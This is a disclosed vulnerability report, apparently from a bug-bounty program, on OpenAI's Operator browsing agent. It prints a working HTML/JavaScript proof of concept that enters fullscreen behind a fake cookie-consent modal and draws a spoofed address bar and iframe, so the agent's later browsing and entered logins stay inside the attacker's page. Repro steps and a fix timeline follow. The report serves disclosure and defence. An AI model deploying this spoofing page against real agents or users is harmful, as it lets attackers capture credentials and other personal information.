This would mean that any information entered thereafter (such as login info, email address, etc) is totally compromised.
Moderate - This vulnerability potentially allows an attacker to access information entered into Operator after Operator visits an attacker’s page.
<meta charset="utf-8">
<body>
<div>
<span>
<a href="#" onclick="fullscreen()">クリックして進む</a></b><br>
</span>
<style>
.cookie-consent-overlay {
position: fixed;
top: 0;
left: 0;
right: 0;
bottom: 0;
background: rgba(0, 0, 0, 0.5);
display: none;
z-index: 9999;
}
/* Centered modal */
.cookie-consent {
position: fixed;
top: 50%;
left: 50%;
transform: translate(-50%, -50%);
background: #333;
color: #fff;
padding: 40px;
text-align: center;
font-size: 24px;
z-index: 10000;
border-radius: 8px;
width: 80%;
max-width: 600px;
box-shadow: 0 0 20px rgba(0,0,0,0.5);
}
.cookie-consent button {
background: #f1d600;
border: none;
color: #333;
padding: 15px 30px;
font-size: 24px;
cursor: pointer;
margin-top: 20px;
border-radius: 4px;
}
</style>
</div>
<style>
body {
overflow-y: hidden;
}
</style>
<template>
<img style="position:absolute;right:0px;top:0px;" height="8%" src="https://test.shhnjk.com/google.png" width="100%">
<input type=text style="position:absolute;left:128px;top:45px;width:1100px;outline: none;" value="https://example.com">
<iframe src="https://example.com" width="100%" height="92%" frameBorder="0" style="position:fixed;top:76px;right:0px"></iframe>
<div class="cookie-consent-overlay" id="cookieConsentOverlay">
<div class="cookie-consent" id="cookieConsent">
<b id=notice>This website uses cookies to ensure you get the best experience.</b>
<br>
<button id=got>Got it!</button>
<button id=close style="display:none;text-align: center;">Close</button>
</div>
</div>
<script>
let input = document.querySelector('input');
let f = document.querySelector('iframe');
input.addEventListener("keypress", event => {
if (event.key === "Enter") {
if (!input.value.includes(".")) {
input.value = "https://www.bing.com/search?q=" + input.value;
} else if (!input.value.startsWith("http")) {
input.value = "https://" + input.value;
}
f.src = input.value;
}
});
</script>
</template>
<script>
function fullscreen() {
document.documentElement.requestFullscreen();
const template_content = document.querySelector('template').content;
document.querySelector('div').appendChild(template_content);
const overlay = document.getElementById("cookieConsentOverlay");
overlay.style.display = "block";
document.querySelector('#got').addEventListener('click',() => {
document.querySelector('#got').style.display = "none";
document.querySelector('#close').style.display = "block";
document.querySelector('#notice').textContent = "Thank you for your understanding!";
});
document.querySelector('#close').addEventListener('click',() => {
document.querySelector('#close').style.display = "none";
overlay.style.display = "none";
});
}
</script>
</body>
shhnjk Finder
Summary
When Operator actuate on a page, the website can trigger Fullscreen API. If the page can grab the attention of Operator while fullscreen notice is on the screen (e.g. by showing cookie consent screen), then Operator does not notice that it was entered in a fullscreen mode.
Therefore, any interaction with Operator after visiting malicious page can be fully captured inside a malicious site, by drawing browser controls + iframe or rendering a remote browser in the DOM.
This would mean that any information entered thereafter (such as login info, email address, etc) is totally compromised.
Repro steps
Summarize the following page: <URL of the PoC>to Operator.Can you go to wikipedia.org and tell me when OpenAI was founded?.Severity
Moderate - This vulnerability potentially allows an attacker to access information entered into Operator after Operator visits an attacker’s page.
Proof of Concept
Timeline
Date reported: 03/07/2025
Date fixed: 05/14/2025
Date disclosed: 06/13/2025